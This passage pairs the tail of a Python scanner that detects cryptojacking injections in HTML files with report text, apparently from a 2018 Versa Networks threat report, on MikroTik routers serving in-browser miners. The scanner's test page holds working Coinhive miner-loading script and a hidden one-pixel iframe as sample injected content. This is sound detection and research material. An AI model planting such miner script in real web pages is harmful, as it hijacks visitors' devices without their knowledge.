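    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".html", ".htm")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_html(fh.read(), path))
    return hits


# Constructed pages: one carrying the injection pattern, one clean.
INJECTED_PAGE = """<html><body><h1>Hello</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER'); miner.start();</script>
<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1"></iframe>
</body></html>"""
CLEAN_PAGE = ('<html><body><p>Nothing to see</p>'
              '<iframe src="https://example.com" width="600" height="400"></iframe></body></html>')


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
            fh.write(INJECTED_PAGE)
        with open(os.path.join(root, "about.htm"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_PAGE)
        for hit in scan_tree(root):
            print(hit)
```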

Mikrotik Routers

The cryptomining campaign involving Mikrotik routers was discovered towards the end of July 201823. The initial infection was reported across Brazil, and it later spread to many other parts of the world. The exploit is based on a Winbox vulnerability that Mikrotik had disclosed and patched. But many router owners failed to apply the patch in a timely manner, which led to a significant attack. When a user behind an infected router tries to access an http site, the router returns a custom 403 error page that hides a script within itself. The script runs the miner in the browser. It also loads the original website in an iframe after about 10 s, while the miner continues to run in the background. Thus, an unsuspecting user does not notice anything wrong and continues browsing.

The campaigns analyzed here display the different techniques attackers use to evade detection and mine. Users have to follow proper security practices and apply patches and updates promptly to stay ahead of attackers and thwart mining attacks. Versa Networks detects the scripts and executables related to these attacks and prevents the download of the infected components, thus protecting systems from unwanted miners.


Samples



References:

1 https://documents.trendmicro.com/assets/rpt/rpt-2018-Midyear-Security-Roundup-unseen-threats-imminent-losses.pdf

2 https://blog.checkpoint.com/2018/07/12/cyber-attack-trends-2018/

3 https://bitcoin.org

4 http://www.hashcash.org/

5 https://cseweb.ucsd.edu/~mbtaylor/papers/Taylor_Bitcoin_IEEE_Computer_2017.pdf

6 https://redlock.io/blog/cryptojacking-tesla

7 https://www.checkpoint.com/press/2018/september-2018s-most-wanted-malware-cryptomining-attacks-against-apple-devices-increase-sharply/

8 https://coinhive.com/

9 https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth

10 https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-uses-various-evasion-techniques-including-windows-installer-as-part-of-its-routine/

11 https://www.forcepoint.com/blog/security-labs/browser-mining-coinhive-and-webassembly

12 https://webassembly.org/

13 https://crypto-loot.com/

14 https://www.coinimp.com/

15 https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry

16 https://blogs.quickheal.com/mirus-cryptomining-virus/

17 https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless

18 https://researchcenter.paloaltonetworks.com/2018/10/unit42-fake-flash-updaters-push-cryptocurrency-miners

19 https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

20 https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/

21 https://blog.sucuri.net/2018/05/cryptomining-through-disguised-url-shorteners.html

22 https://blog.malwarebytes.com/threat-analysis/2018/07/obfuscated-coinhive-shortlink-reveals-larger-mining-operation/

23 https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/


Versa Networks, Inc, 6001 America Center Dr, 4th floor, Suite 400, San Jose, CA 95002

+1 408.385.7660 | [email protected] | www.versa-networks.com

© 2018 Versa Networks, Inc. All rights reserved. Portions of Versa products are protected under Versa patents, as well as patents pending. Versa Networks and FlexVNF are trademarks or registered trademarks of Versa Networks, Inc. All other trademarks used or mentioned herein belong to their respective owners. Part# SR_T10CRYPT18-01.1